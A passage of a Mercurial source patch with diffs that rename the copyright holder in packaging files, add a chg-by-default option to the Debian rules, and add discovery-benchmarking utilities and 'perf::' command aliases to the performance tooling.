d="M-138.11,68.688c0.45-0.406,2.73-0.24,4.79-1.35,2.07-1.109,4.52-3.54,4.95-6.994,0.26-2.029,0.34-1.519,0.44-0.415-0.32,5.743-5.6,8.916-8.62,9.334-0.82,0.113-2.25,0.044-1.56-0.575z"/><path id="path2561_1_" fill="#999" d="M-47.767,69.694c8.532-24.594-9.323-61.736-45.446-57.268-32.637,4.035-33.167,38.389-4.4,46.55,32.582,4.933,12.962,29.512,10.179,41.904-2.495,11.11,26.331,12.94,39.667-31.186z"/><path id="path2571" fill="#f3f3f3" d="M-70.093,88.904c-8.827-1.092-21.529,18.836-9.552,16.506,5.756-0.86,10.525-2.89,14.794-7.762,5.567-6.353,13.883-20.074,16.288-28.94,2.025-7.476,1.007-19.057-1.081-8.175-2.142,11.167-11.623,29.464-20.449,28.371z"/><path id="path2581" fill="#999" d="M-129.39,104.85c2.05,0.03,3.28,0.32,5.35,1.77,4.09,1.7,11.61,0.62,15.09-3.95,3.47-4.57,3.58-10.868,2.26-14.674-3.24-9.314-16.99-9.149-23.13-1.417-6.64,8.636-1.61,18.231,0.43,18.271z"/><path id="path2593_2_" fill="#999" d="M-147.64,61.684c0.41,1.282,1.45,3.154,3.65,3.466,2.94,0.417,3.54,1.743,7,1.055,3.47-0.688,6.09-3.528,7.14-6.67,1.21-4.347-0.59-6.591-3.31-8.595-2.71-2.003-8.67-1.788-12.23,1.458-2.53,2.305-3.24,6.163-2.25,9.286z"/><path id="path256" fill="#f3f3f3" d="M-136.11,64.558c2.66-0.697,6.18-4.325,4.44-7.096-2.16-3.413-8.17-0.491-8.37,3.309-0.21,3.802,1.11,4.526,3.93,3.787z"/><path id="path258" fill="#f3f3f3" d="M-116.12,105.51c2.28-0.6,9.24-3.43,7.93-13.547-0.66-5.126-3.46,6.361-8.63,8.077-7.85,2.61-6.97,7.48,0.7,5.47z"/></g> </svg> diff --git a/contrib/memory.py b/contrib/memory.py --- a/contrib/memory.py +++ b/contrib/memory.py @@ -1,6 +1,6 @@ # memory.py - track memory usage # -# Copyright 2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
diff --git a/contrib/packaging/debian/control b/contrib/packaging/debian/control --- a/contrib/packaging/debian/control +++ b/contrib/packaging/debian/control @@ -25,7 +25,9 @@ Suggests: wish Replaces: mercurial-common Breaks: mercurial-common +Provides: python3-mercurial Architecture: any +Homepage: https://www.mercurial-scm.org/ Description: fast, easy to use, distributed revision control tool. Mercurial is a fast, lightweight Source Control Management system designed for efficient handling of very large distributed projects. diff --git a/contrib/packaging/debian/copyright b/contrib/packaging/debian/copyright --- a/contrib/packaging/debian/copyright +++ b/contrib/packaging/debian/copyright @@ -3,7 +3,7 @@ Source: https://www.mercurial-scm.org/ Files: * -Copyright: 2005-2021, Matt Mackall <mpm@selenic.com> and others. +Copyright: 2005-2021, Olivia Mackall <olivia@selenic.com> and others. License: GPL-2+ This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public diff --git a/contrib/packaging/debian/rules b/contrib/packaging/debian/rules --- a/contrib/packaging/debian/rules +++ b/contrib/packaging/debian/rules @@ -18,6 +18,10 @@ # DEB_HG_PYTHON_VERSIONS="3.7 3.8" make deb DEB_HG_MULTI_VERSION?=0 +# Set to 1 to make /usr/bin/hg a symlink to chg, and move hg to +# /usr/lib/mercurial/hg. +DEB_HG_CHG_BY_DEFAULT?=0 + CPUS=$(shell cat /proc/cpuinfo | grep -E ^processor | wc -l) # By default, only build for the version of python3 that the system considers @@ -40,6 +44,12 @@ DEB_HG_PYTHON_VERSIONS?=$(shell py3versions -vd) endif +ifeq ($(DEB_HG_CHG_BY_DEFAULT), 1) + # Important: the "real" hg must have a 'basename' of 'hg'. Otherwise, hg + # behaves differently when setting $HG and breaks aliases that use that. 
+ export HGPATH=/usr/lib/mercurial/hg +endif + export HGPYTHON3=1 export PYTHON=python3 @@ -86,3 +96,8 @@ cp contrib/bash_completion "$(CURDIR)"/debian/mercurial/usr/share/bash-completion/completions/hg mkdir -p "$(CURDIR)"/debian/mercurial/usr/share/zsh/vendor-completions cp contrib/zsh_completion "$(CURDIR)"/debian/mercurial/usr/share/zsh/vendor-completions/_hg + if [ "$(DEB_HG_CHG_BY_DEFAULT)" -eq 1 ]; then \ + mkdir -p "$(CURDIR)"/debian/mercurial/usr/lib/mercurial; \ + mv "$(CURDIR)"/debian/mercurial/usr/bin/hg "$(CURDIR)"/debian/mercurial/usr/lib/mercurial/hg; \ + ln -s chg "$(CURDIR)"/debian/mercurial/usr/bin/hg; \ + fi diff --git a/contrib/packaging/hgpackaging/util.py b/contrib/packaging/hgpackaging/util.py --- a/contrib/packaging/hgpackaging/util.py +++ b/contrib/packaging/hgpackaging/util.py @@ -161,10 +161,10 @@ >>> normalize_windows_version("5.3rc1") '5.3.0.1' - >>> normalize_windows_version("5.3rc1+2-abcdef") + >>> normalize_windows_version("5.3rc1+hg2.abcdef") '5.3.0.1' - >>> normalize_windows_version("5.3+2-abcdef") + >>> normalize_windows_version("5.3+hg2.abcdef") '5.3.0.2' """ if '+' in version: @@ -188,8 +188,8 @@ if rc is not None: versions.append(rc) elif extra: - # <commit count>-<hash>+<date> - versions.append(int(extra.split('-')[0])) + # hg<commit count>.<hash>+<date> + versions.append(int(extra.split('.')[0][2:])) return '.'.join('%d' % x for x in versions[0:4]) diff --git a/contrib/packaging/inno/mercurial.iss b/contrib/packaging/inno/mercurial.iss --- a/contrib/packaging/inno/mercurial.iss +++ b/contrib/packaging/inno/mercurial.iss @@ -6,7 +6,7 @@ #endif [Setup] -AppCopyright=Copyright 2005-2021 Matt Mackall and others +AppCopyright=Copyright 2005-2021 Olivia Mackall and others AppName=Mercurial AppVersion={#VERSION} OutputBaseFilename=Mercurial-{#VERSION}{#SUFFIX} @@ -20,7 +20,7 @@ InfoAfterFile=../postinstall.txt LicenseFile=Copying.txt ShowLanguageDialog=yes -AppPublisher=Matt Mackall and others +AppPublisher=Olivia Mackall and others 
AppPublisherURL=https://mercurial-scm.org/ AppSupportURL=https://mercurial-scm.org/ AppUpdatesURL=https://mercurial-scm.org/ @@ -29,8 +29,8 @@ DefaultDirName={pf}\Mercurial SourceDir=stage VersionInfoDescription=Mercurial distributed SCM (version {#VERSION}) -VersionInfoCopyright=Copyright 2005-2021 Matt Mackall and others -VersionInfoCompany=Matt Mackall and others +VersionInfoCopyright=Copyright 2005-2021 Olivia Mackall and others +VersionInfoCompany=Olivia Mackall and others VersionInfoVersion={#QUAD_VERSION} InternalCompressLevel=max SolidCompression=true diff --git a/contrib/packaging/wix/mercurial.wxs b/contrib/packaging/wix/mercurial.wxs --- a/contrib/packaging/wix/mercurial.wxs +++ b/contrib/packaging/wix/mercurial.wxs @@ -19,14 +19,14 @@ Name='Mercurial $(var.Version) ($(var.Platform))' UpgradeCode='$(var.ProductUpgradeCode)' Language='1033' Codepage='1252' Version='$(var.Version)' - Manufacturer='Matt Mackall and others'> + Manufacturer='Olivia Mackall and others'> <Package Id='*' Keywords='Installer' Description="Mercurial distributed SCM (version $(var.Version))" Comments='$(var.Comments)' Platform='$(var.Platform)' - Manufacturer='Matt Mackall and others' + Manufacturer='Olivia Mackall and others' InstallerVersion='300' Languages='1033' Compressed='yes' SummaryCodepage='1252' /> <Media Id='1' Cabinet='mercurial.cab' EmbedCab='yes' DiskPrompt='CD-ROM #1' diff --git a/contrib/perf-utils/search-discovery-case b/contrib/perf-utils/search-discovery-case new file mode 100755 --- /dev/null +++ b/contrib/perf-utils/search-discovery-case @@ -0,0 +1,198 @@ +#!/usr/bin/env python3 +# Search for interesting discovery instance +# +# search-discovery-case REPO [REPO]… +# +# This use a subsetmaker extension (next to this script) to generate a steam of +# random discovery instance. When interesting case are discovered, information +# about them are print on the stdout. 
+from __future__ import print_function + +import json +import os +import queue +import random +import signal +import subprocess +import sys +import threading + +this_script = os.path.abspath(sys.argv[0]) +this_dir = os.path.dirname(this_script) +hg_dir = os.path.join(this_dir, '..', '..') +HG_REPO = os.path.normpath(hg_dir) +HG_BIN = os.path.join(HG_REPO, 'hg') + +JOB = int(os.environ.get('NUMBER_OF_PROCESSORS', 8)) + + +SLICING = ('scratch', 'randomantichain', 'rev') + + +def nb_revs(repo_path): + cmd = [ + HG_BIN, + '--repository', + repo_path, + 'log', + '--template', + '{rev}', + '--rev', + 'tip', + ] + s = subprocess.Popen(cmd, stdout=subprocess.PIPE) + out, err = s.communicate() + return int(out) + + +repos = [] +for repo in sys.argv[1:]: + size = nb_revs(repo) + repos.append((repo, size)) + + +def pick_one(repo): + pick = random.choice(SLICING) + seed = random.randint(0, 100000) + if pick == 'scratch': + start = int(repo[1] * 0.3) + end = int(repo[1] * 0.7) + nb = random.randint(start, end) + return ('scratch', nb, seed) + elif pick == 'randomantichain': + return ('randomantichain', seed) + elif pick == 'rev': + start = int(repo[1] * 0.3) + end = int(repo[1]) + rev = random.randint(start, end) + return ('rev', rev) + else: + assert False + + +done = threading.Event() +cases = queue.Queue(maxsize=10 * JOB) +results = queue.Queue() + + +def worker(): + while not done.is_set(): + c = cases.get() + if c is None: + return + try: + res = process(c) + results.put((c, res)) + except Exception as exc: + print('processing-failed: %s %s' % (c, exc), file=sys.stderr) + c = (c[0], c[2], c[1]) + try: + res = process(c) + results.put((c, res)) + except Exception as exc: + print('processing-failed: %s %s' % (c, exc), file=sys.stderr) + + +SUBSET_PATH = os.path.join(HG_REPO, 'contrib', 'perf-utils', 'subsetmaker.py') + + +CMD_BASE = ( + HG_BIN, + 'debugdiscovery', + '--template', + 'json', + '--config', + 'extensions.subset=%s' % SUBSET_PATH, +) +# '--local-as-revs "$left" 
--local-as-revs "$right"' +# > /data/discovery-references/results/disco-mozilla-unified-$1-$2.txt +# ) + + +def to_revsets(case): + t = case[0] + if t == 'scratch': + return 'not scratch(all(), %d, "%d")' % (case[1], case[2]) + elif t == 'randomantichain': + return '::randomantichain(all(), "%d")' % case[1] + elif t == 'rev': + return '::%d' % case[1] + else: + assert False + + +def process(case): + (repo, left, right) = case + cmd = list(CMD_BASE) + cmd.append('-R') + cmd.append(repo[0]) + cmd.append('--local-as-revs') + cmd.append(to_revsets(left)) + cmd.append('--remote-as-revs') + cmd.append(to_revsets(right)) + s = subprocess.Popen(cmd, stdout=subprocess.PIPE) + out, err = s.communicate() + return json.loads(out)[0] + + +def interesting_boundary(res): + """check if a case is interesting or not + + For now we are mostly interrested in case were we do multiple roundstrip + and where the boundary is somewhere in the middle of the undecided set. + + Ideally, we would make this configurable, but this is not a focus for now + + return None or (round-trip, undecided-common, undecided-missing) + """ + roundtrips = res["total-roundtrips"] + if roundtrips <= 1: + return None + undecided_common = res["nb-ini_und-common"] + undecided_missing = res["nb-ini_und-missing"] + if undecided_common == 0: + return None + if undecided_missing == 0: + return None + return (roundtrips, undecided_common, undecided_missing) + + +def end(*args, **kwargs): + done.set() + + +def format_case(case): + return '-'.join(str(s) for s in case) + + +signal.signal(signal.SIGINT, end) + +for i in range(JOB): + threading.Thread(target=worker).start() + +nb_cases = 0 +while not done.is_set(): + repo = random.choice(repos) + left = pick_one(repo) + right = pick_one(repo) + cases.put((repo, left, right)) + while not results.empty(): + # results has a single reader so this is fine + c, res = results.get_nowait() + boundary = interesting_boundary(res) + if boundary is not None: + print(c[0][0], 
format_case(c[1]), format_case(c[2]), *boundary) + sys.stdout.flush() + + nb_cases += 1 + if not nb_cases % 100: + print('[%d cases generated]' % nb_cases, file=sys.stderr) + +for i in range(JOB): + try: + cases.put_nowait(None) + except queue.Full: + pass + +print('[%d cases generated]' % nb_cases, file=sys.stderr) +print('[ouput generation is over]' % nb_cases, file=sys.stderr) diff --git a/contrib/perf-utils/subsetmaker.py b/contrib/perf-utils/subsetmaker.py new file mode 100644 --- /dev/null +++ b/contrib/perf-utils/subsetmaker.py @@ -0,0 +1,170 @@ +"""revset to select sample of repository + +Hopefully this is useful to create interesting discovery cases. +""" + +import collections +import random + +from mercurial.i18n import _ + +from mercurial import ( + registrar, + revset, + revsetlang, + smartset, +) + +revsetpredicate = registrar.revsetpredicate() + + +@revsetpredicate(b'subsetspec("<spec>")') +def subsetmarkerspec(repo, subset, x): + """use a shorthand spec as used by search-discovery-case + + Supported format are: + + - "scratch-count-seed": not scratch(all(), count, "seed") + - "randomantichain-seed": ::randomantichain(all(), "seed") + - "rev-REV": "::REV" + """ + args = revsetlang.getargs( + x, 0, 1, _(b'subsetspec("spec") required an argument') + ) + + spec = revsetlang.getstring(args[0], _(b"spec should be a string")) + case = spec.split(b'-') + t = case[0] + if t == b'scratch': + spec_revset = b'not scratch(all(), %s, "%s")' % (case[1], case[2]) + elif t == b'randomantichain': + spec_revset = b'::randomantichain(all(), "%s")' % case[1] + elif t == b'rev': + spec_revset = b'::%d' % case[1] + else: + assert False, spec + + selected = repo.revs(spec_revset) + + return selected & subset + + +@revsetpredicate(b'scratch(REVS, <count>, [seed])') +def scratch(repo, subset, x): + """randomly remove <count> revision from the repository top + + This subset is created by recursively picking changeset starting from the + heads. 
It can be summarized using the following algorithm:: + + selected = set() + for i in range(<count>): + unselected = repo.revs("not <selected>") + candidates = repo.revs("heads(<unselected>)") + pick = random.choice(candidates) + selected.add(pick) + """ + m = _(b"scratch expects revisions, count argument and an optional seed") + args = revsetlang.getargs(x, 2, 3, m) + if len(args) == 2: + x, n = args + rand = random + elif len(args) == 3: + x, n, seed = args + seed = revsetlang.getinteger(seed, _(b"seed should be a number")) + rand = random.Random(seed) + else: + assert False + + n = revsetlang.getinteger(n, _(b"scratch expects a number")) + + selected = set() + heads = set() + children_count = collections.defaultdict(lambda: 0) + parents = repo.changelog._uncheckedparentrevs + + baseset = revset.getset(repo, smartset.fullreposet(repo), x) + baseset.sort() + for r in baseset: + heads.add(r) + + p1, p2 = parents(r) + if p1 >= 0: + heads.discard(p1) + children_count[p1] += 1 + if p2 >= 0: + heads.discard(p2) + children_count[p2] += 1 + + for h in heads: + assert children_count[h] == 0 + + selected = set() + for x in range(n): + if not heads: + break + pick = rand.choice(list(heads)) + heads.remove(pick) + assert pick not in selected + selected.add(pick) + p1, p2 = parents(pick) + if p1 in children_count: + assert p1 in children_count + children_count[p1] -= 1 + assert children_count[p1] >= 0 + if children_count[p1] == 0: + assert p1 not in selected, (r, p1) + heads.add(p1) + if p2 in children_count: + assert p2 in children_count + children_count[p2] -= 1 + assert children_count[p2] >= 0 + if children_count[p2] == 0: + assert p2 not in selected, (r, p2) + heads.add(p2) + + return smartset.baseset(selected) & subset + + +@revsetpredicate(b'randomantichain(REVS, [seed])') +def antichain(repo, subset, x): + """Pick a random anti-chain in the repository + + A antichain is a set of changeset where there isn't any element that is + either a descendant or ancestors of any 
other element in the set. In other + word, all the elements are independant. It can be summarized with the + following algorithm:: + + selected = set() + unselected = repo.revs('all()') + while unselected: + pick = random.choice(unselected) + selected.add(pick) + unselected -= repo.revs('::<pick> + <pick>::') + """ + + args = revsetlang.getargs( + x, 1, 2, _(b"randomantichain expects revisions and an optional seed") + ) + if len(args) == 1: + (x,) = args + rand = random + elif len(args) == 2: + x, seed = args + seed = revsetlang.getinteger(seed, _(b"seed should be a number")) + rand = random.Random(seed) + else: + assert False + + selected = set() + + baseset = revset.getset(repo, smartset.fullreposet(repo), x) + undecided = baseset + + while undecided: + pick = rand.choice(list(undecided)) + selected.add(pick) + undecided = repo.revs( + '%ld and not (::%ld or %ld::head())', baseset, selected, selected + ) + + return smartset.baseset(selected) & subset diff --git a/contrib/perf.py b/contrib/perf.py --- a/contrib/perf.py +++ b/contrib/perf.py @@ -744,7 +744,7 @@ # perf commands -@command(b'perfwalk', formatteropts) +@command(b'perf::walk|perfwalk', formatteropts) def perfwalk(ui, repo, *pats, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -759,7 +759,7 @@ fm.end() -@command(b'perfannotate', formatteropts) +@command(b'perf::annotate|perfannotate', formatteropts) def perfannotate(ui, repo, f, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -769,7 +769,7 @@ @command( - b'perfstatus', + b'perf::status|perfstatus', [ (b'u', b'unknown', False, b'ask status to look for unknown files'), (b'', b'dirstate', False, b'benchmark the internal dirstate call'), @@ -806,7 +806,7 @@ fm.end() -@command(b'perfaddremove', formatteropts) +@command(b'perf::addremove|perfaddremove', formatteropts) def perfaddremove(ui, repo, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -837,7 +837,7 @@ cl._nodepos = None 
-@command(b'perfheads', formatteropts) +@command(b'perf::heads|perfheads', formatteropts) def perfheads(ui, repo, **opts): """benchmark the computation of a changelog heads""" opts = _byteskwargs(opts) @@ -855,7 +855,7 @@ @command( - b'perftags', + b'perf::tags|perftags', formatteropts + [ (b'', b'clear-revlogs', False, b'refresh changelog and manifest'), @@ -880,7 +880,7 @@ fm.end() -@command(b'perfancestors', formatteropts) +@command(b'perf::ancestors|perfancestors', formatteropts) def perfancestors(ui, repo, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -894,7 +894,7 @@ fm.end() -@command(b'perfancestorset', formatteropts) +@command(b'perf::ancestorset|perfancestorset', formatteropts) def perfancestorset(ui, repo, revset, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -910,12 +910,18 @@ fm.end() -@command(b'perfdiscovery', formatteropts, b'PATH') +@command(b'perf::discovery|perfdiscovery', formatteropts, b'PATH') def perfdiscovery(ui, repo, path, **opts): """benchmark discovery between local repo and the peer at given path""" repos = [repo, None] timer, fm = gettimer(ui, opts) - path = ui.expandpath(path) + + try: + from mercurial.utils.urlutil import get_unique_pull_path + + path = get_unique_pull_path(b'perfdiscovery', repo, ui, path)[0] + except ImportError: + path = ui.expandpath(path) def s(): repos[1] = hg.peer(ui, opts, path) @@ -928,7 +934,7 @@ @command( - b'perfbookmarks', + b'perf::bookmarks|perfbookmarks', formatteropts + [ (b'', b'clear-revlogs', False, b'refresh changelog and manifest'), @@ -953,7 +959,7 @@ fm.end() -@command(b'perfbundleread', formatteropts, b'BUNDLE') +@command(b'perf::bundleread|perfbundleread', formatteropts, b'BUNDLE') def perfbundleread(ui, repo, bundlepath, **opts): """Benchmark reading of bundle files. 
@@ -1080,7 +1086,7 @@ @command( - b'perfchangegroupchangelog', + b'perf::changegroupchangelog|perfchangegroupchangelog', formatteropts + [ (b'', b'cgversion', b'02', b'changegroup version'), @@ -1116,7 +1122,7 @@ fm.end() -@command(b'perfdirs', formatteropts) +@command(b'perf::dirs|perfdirs', formatteropts) def perfdirs(ui, repo, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -1132,7 +1138,7 @@ @command( - b'perfdirstate', + b'perf::dirstate|perfdirstate', [ ( b'', @@ -1195,7 +1201,7 @@ fm.end() -@command(b'perfdirstatedirs', formatteropts) +@command(b'perf::dirstatedirs|perfdirstatedirs', formatteropts) def perfdirstatedirs(ui, repo, **opts): """benchmap a 'dirstate.hasdir' call from an empty `dirs` cache""" opts = _byteskwargs(opts) @@ -1212,7 +1218,7 @@ fm.end() -@command(b'perfdirstatefoldmap', formatteropts) +@command(b'perf::dirstatefoldmap|perfdirstatefoldmap', formatteropts) def perfdirstatefoldmap(ui, repo, **opts): """benchmap a `dirstate._map.filefoldmap.get()` request @@ -1233,7 +1239,7 @@ fm.end() -@command(b'perfdirfoldmap', formatteropts) +@command(b'perf::dirfoldmap|perfdirfoldmap', formatteropts) def perfdirfoldmap(ui, repo, **opts): """benchmap a `dirstate._map.dirfoldmap.get()` request @@ -1255,7 +1261,7 @@ fm.end() -@command(b'perfdirstatewrite', formatteropts) +@command(b'perf::dirstatewrite|perfdirstatewrite', formatteropts) def perfdirstatewrite(ui, repo, **opts): """benchmap the time it take to write a dirstate on disk""" opts = _byteskwargs(opts) @@ -1297,7 +1303,7 @@ @command( - b'perfmergecalculate', + b'perf::mergecalculate|perfmergecalculate', [ (b'r', b'rev', b'.', b'rev to merge against'), (b'', b'from', b'', b'rev to merge from'), @@ -1330,7 +1336,7 @@ @command( - b'perfmergecopies', + b'perf::mergecopies|perfmergecopies', [ (b'r', b'rev', b'.', b'rev to merge against'), (b'', b'from', b'', b'rev to merge from'), @@ -1353,7 +1359,7 @@ fm.end() -@command(b'perfpathcopies', [], b"REV REV") 
+@command(b'perf::pathcopies|perfpathcopies', [], b"REV REV") def perfpathcopies(ui, repo, rev1, rev2, **opts): """benchmark the copy tracing logic""" opts = _byteskwargs(opts) @@ -1369,7 +1375,7 @@ @command( - b'perfphases', + b'perf::phases|perfphases', [ (b'', b'full', False, b'include file reading time too'), ], @@ -1394,7 +1400,7 @@ fm.end() -@command(b'perfphasesremote', [], b"[DEST]") +@command(b'perf::phasesremote|perfphasesremote', [], b"[DEST]") def perfphasesremote(ui, repo, dest=None, **opts): """benchmark time needed to analyse phases of the remote server""" from mercurial.node import bin @@ -1407,7 +1413,7 @@ opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) - path = ui.paths.getpath(dest, default=(b'default-push', b'default')) + path = ui.getpath(dest, default=(b'default-push', b'default')) if not path: raise error.Abort( b'default repository not configured!', @@ -1455,7 +1461,7 @@ @command( - b'perfmanifest', + b'perf::manifest|perfmanifest', [ (b'm', b'manifest-rev', False, b'Look up a manifest node revision'), (b'', b'clear-disk', False, b'clear on-disk caches too'), @@ -1499,7 +1505,7 @@ fm.end() -@command(b'perfchangeset', formatteropts) +@command(b'perf::changeset|perfchangeset', formatteropts) def perfchangeset(ui, repo, rev, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -1513,7 +1519,7 @@ fm.end() -@command(b'perfignore', formatteropts) +@command(b'perf::ignore|perfignore', formatteropts) def perfignore(ui, repo, **opts): """benchmark operation related to computing ignore""" opts = _byteskwargs(opts) @@ -1532,7 +1538,7 @@ @command( - b'perfindex', + b'perf::index|perfindex', [ (b'', b'rev', [], b'revision to be looked up (default tip)'), (b'', b'no-lookup', None, b'do not revision lookup post creation'), @@ -1596,7 +1602,7 @@ @command( - b'perfnodemap', + b'perf::nodemap|perfnodemap', [ (b'', b'rev', [], b'revision to be looked up (default tip)'), (b'', b'clear-caches', True, b'clear revlog cache between calls'), 
@@ -1667,7 +1673,7 @@ fm.end() -@command(b'perfstartup', formatteropts) +@command(b'perf::startup|perfstartup', formatteropts) def perfstartup(ui, repo, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -1685,7 +1691,7 @@ fm.end() -@command(b'perfparents', formatteropts) +@command(b'perf::parents|perfparents', formatteropts) def perfparents(ui, repo, **opts): """benchmark the time necessary to fetch one changeset's parents. @@ -1712,7 +1718,7 @@ fm.end() -@command(b'perfctxfiles', formatteropts) +@command(b'perf::ctxfiles|perfctxfiles', formatteropts) def perfctxfiles(ui, repo, x, **opts): opts = _byteskwargs(opts) x = int(x) @@ -1725,7 +1731,7 @@ fm.end() -@command(b'perfrawfiles', formatteropts) +@command(b'perf::rawfiles|perfrawfiles', formatteropts) def perfrawfiles(ui, repo, x, **opts): opts = _byteskwargs(opts) x = int(x) @@ -1739,7 +1745,7 @@ fm.end() -@command(b'perflookup', formatteropts) +@command(b'perf::lookup|perflookup', formatteropts) def perflookup(ui, repo, rev, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -1748,7 +1754,7 @@ @command( - b'perflinelogedits', + b'perf::linelogedits|perflinelogedits', [ (b'n', b'edits', 10000, b'number of edits'), (b'', b'max-hunk-lines', 10, b'max lines in a hunk'), @@ -1786,7 +1792,7 @@ fm.end() -@command(b'perfrevrange', formatteropts) +@command(b'perf::revrange|perfrevrange', formatteropts) def perfrevrange(ui, repo, *specs, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -1795,7 +1801,7 @@ fm.end() -@command(b'perfnodelookup', formatteropts) +@command(b'perf::nodelookup|perfnodelookup', formatteropts) def perfnodelookup(ui, repo, rev, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -1814,7 +1820,7 @@ @command( - b'perflog', + b'perf::log|perflog', [(b'', b'rename', False, b'ask log to follow renames')] + formatteropts, ) def perflog(ui, repo, rev=None, **opts): @@ -1832,7 +1838,7 @@ fm.end() -@command(b'perfmoonwalk', 
formatteropts) +@command(b'perf::moonwalk|perfmoonwalk', formatteropts) def perfmoonwalk(ui, repo, **opts): """benchmark walking the changelog backwards @@ -1851,7 +1857,7 @@ @command( - b'perftemplating', + b'perf::templating|perftemplating', [ (b'r', b'rev', [], b'revisions to run the template on'), ] @@ -1941,7 +1947,7 @@ @command( - b'perfhelper-mergecopies', + b'perf::helper-mergecopies|perfhelper-mergecopies', formatteropts + [ (b'r', b'revs', [], b'restrict search to these revisions'), @@ -2124,7 +2130,7 @@ @command( - b'perfhelper-pathcopies', + b'perf::helper-pathcopies|perfhelper-pathcopies', formatteropts + [ (b'r', b'revs', [], b'restrict search to these revisions'), @@ -2263,7 +2269,7 @@ _displaystats(ui, opts, entries, alldata) -@command(b'perfcca', formatteropts) +@command(b'perf::cca|perfcca', formatteropts) def perfcca(ui, repo, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -2271,7 +2277,7 @@ fm.end() -@command(b'perffncacheload', formatteropts) +@command(b'perf::fncacheload|perffncacheload', formatteropts) def perffncacheload(ui, repo, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -2284,7 +2290,7 @@ fm.end() -@command(b'perffncachewrite', formatteropts) +@command(b'perf::fncachewrite|perffncachewrite', formatteropts) def perffncachewrite(ui, repo, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -2304,7 +2310,7 @@ fm.end() -@command(b'perffncacheencode', formatteropts) +@command(b'perf::fncacheencode|perffncacheencode', formatteropts) def perffncacheencode(ui, repo, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -2348,7 +2354,7 @@ @command( - b'perfbdiff', + b'perf::bdiff|perfbdiff', revlogopts + formatteropts + [ @@ -2464,7 +2470,7 @@ @command( - b'perfunidiff', + b'perf::unidiff|perfunidiff', revlogopts + formatteropts + [ @@ -2543,7 +2549,7 @@ fm.end() -@command(b'perfdiffwd', formatteropts) +@command(b'perf::diffwd|perfdiffwd', formatteropts) def 
perfdiffwd(ui, repo, **opts): """Profile diff of working directory changes""" opts = _byteskwargs(opts) @@ -2568,7 +2574,11 @@ fm.end() -@command(b'perfrevlogindex', revlogopts + formatteropts, b'-c|-m|FILE') +@command( + b'perf::revlogindex|perfrevlogindex', + revlogopts + formatteropts, + b'-c|-m|FILE', +) def perfrevlogindex(ui, repo, file_=None, **opts): """Benchmark operations against a revlog index. @@ -2704,7 +2714,7 @@ @command( - b'perfrevlogrevisions', + b'perf::revlogrevisions|perfrevlogrevisions', revlogopts + formatteropts + [ @@ -2754,7 +2764,7 @@ @command( - b'perfrevlogwrite', + b'perf::revlogwrite|perfrevlogwrite', revlogopts + formatteropts + [ @@ -3047,7 +3057,7 @@ @command( - b'perfrevlogchunks', + b'perf::revlogchunks|perfrevlogchunks', revlogopts + formatteropts + [ @@ -3176,7 +3186,7 @@ @command( - b'perfrevlogrevision', + b'perf::revlogrevision|perfrevlogrevision', revlogopts + formatteropts + [(b'', b'cache', False, b'use caches instead of clearing')], @@ -3218,7 +3228,10 @@ start = r.start length = r.length inline = r._inline - iosize = r._io.size + try: + iosize = r.index.entry_size + except AttributeError: + iosize = r._io.size buffer = util.buffer chunks = [] @@ -3319,7 +3332,7 @@ @command( - b'perfrevset', + b'perf::revset|perfrevset', [ (b'C', b'clear', False, b'clear volatile cache between each call.'), (b'', b'contexts', False, b'obtain changectx for each revision'), @@ -3352,7 +3365,7 @@ @command( - b'perfvolatilesets', + b'perf::volatilesets|perfvolatilesets', [ (b'', b'clear-obsstore', False, b'drop obsstore between each call.'), ] @@ -3401,7 +3414,7 @@ @command( - b'perfbranchmap', + b'perf::branchmap|perfbranchmap', [ (b'f', b'full', False, b'Includes build time of subset'), ( @@ -3492,7 +3505,7 @@ @command( - b'perfbranchmapupdate', + b'perf::branchmapupdate|perfbranchmapupdate', [ (b'', b'base', [], b'subset of revision to start from'), (b'', b'target', [], b'subset of revision to end with'), @@ -3602,7 +3615,7 @@ @command( - 
b'perfbranchmapload', + b'perf::branchmapload|perfbranchmapload', [ (b'f', b'filter', b'', b'Specify repoview filter'), (b'', b'list', False, b'List brachmap filter caches'), @@ -3661,19 +3674,19 @@ fm.end() -@command(b'perfloadmarkers') +@command(b'perf::loadmarkers|perfloadmarkers') def perfloadmarkers(ui, repo): """benchmark the time to parse the on-disk markers for a repo Result is the number of markers in the repo.""" timer, fm = gettimer(ui) svfs = getsvfs(repo) - timer(lambda: len(obsolete.obsstore(svfs))) + timer(lambda: len(obsolete.obsstore(repo, svfs))) fm.end() @command( - b'perflrucachedict', + b'perf::lrucachedict|perflrucachedict', formatteropts + [ (b'', b'costlimit', 0, b'maximum total cost of items in cache'), @@ -3829,7 +3842,7 @@ @command( - b'perfwrite', + b'perf::write|perfwrite', formatteropts + [ (b'', b'write-method', b'write', b'ui write method'), @@ -3892,7 +3905,7 @@ @command( - b'perfprogress', + b'perf::progress|perfprogress', formatteropts + [ (b'', b'topic', b'topic', b'topic for progress messages'), diff --git a/contrib/python-zstandard/c-ext/bufferutil.c b/contrib/python-zstandard/c-ext/bufferutil.c --- a/contrib/python-zstandard/c-ext/bufferutil.c +++ b/contrib/python-zstandard/c-ext/bufferutil.c @@ -758,7 +758,7 @@ }; void bufferutil_module_init(PyObject* mod) { - Py_TYPE(&ZstdBufferWithSegmentsType) = 